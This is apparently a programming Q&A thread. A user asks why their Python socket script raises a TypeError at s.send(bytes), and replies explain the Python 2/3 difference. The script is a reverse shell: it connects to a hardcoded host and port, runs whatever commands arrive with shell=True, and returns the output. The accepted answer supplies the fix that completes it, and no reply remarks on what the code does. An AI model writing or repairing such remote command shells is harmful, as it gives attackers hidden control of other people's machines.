# Getting this error "TypeError: a bytes-like object is required, not 'type' " at s.send(bytes)

Tags: python, python-2.7, python-3.x, sockets, websocket

Done everything I can. Could someone tell me that exact area of error.
  Also tried to change this into "encode("utf-8)* but nothing.

```
import os
import socket
import subprocess


s = socket.socket()
host = '192.168.1.100'
port = 9988
s.connect((host,port))

while True:
 data = s.recv(1024)
if data[:2].decode("utf-8") == 'cd':
    os.chdir((data[3:].decode("utf-8")))
if len(data) > 0:
 cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True,        stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
 output_bytes = cmd.stdout.read() + cmd.stderr.read()
 output_str = str(output_bytes, "utf-8")
 s.send(bytes)
```

Comment: It looks you are trying to send `bytes`, an internal type of Python, instead of `output_bytes` prepared by you.

Comment: `bytes` is keyword in python

Answer (score 0, accepted):

Python2.x:

> socket.send(string[, flags])
>   Send data to the socket. The socket must be connected to a remote socket. The optional flags argument has the same meaning as for recv() above. Returns the number of bytes sent. Applications are responsible for checking that all data has been sent; if only some of the data was transmitted, the application needs to attempt delivery of the remaining data. For further information on this concept, consult the Socket Programming HOWTO.

Python3

> socket.send(bytes[, flags])
>   Send data to the socket. The socket must be connected to a remote socket. The optional flags argument has the same meaning as for recv() above. Returns the number of bytes sent. Applications are responsible for checking that all data has been sent; if only some of the data was transmitted, the application needs to attempt delivery of the remaining data. For further information on this topic, consult the Socket Programming HOWTO.

You marked your question with both python2 and python3 tags, but the `socket.send()` in python2.x and python3 are different. In python2, `send()` expects string type but in python3 it is expecting bytes-like objects, what you can do is passing `str.encode()` objects to it.

You were passing `bytes` but it is python built-in type other than bytes-like object.

You can try `s.send(output_str.encode())`, it will send out the encoded output_str to client side(once client receives the data, it has to decode it).

Comment: You are awesome Sir!I have been stuck here since a week.. Thank you so much, Sir. :)

Answer (score 0):

You didn't bind name "bytes" to any string. So builtin type "bytes" is passed to s.send function.

Answer (score 0):

You need to send the output string,

```
s.send(output_str)
```

Because `bytes` is an in-built data type in python.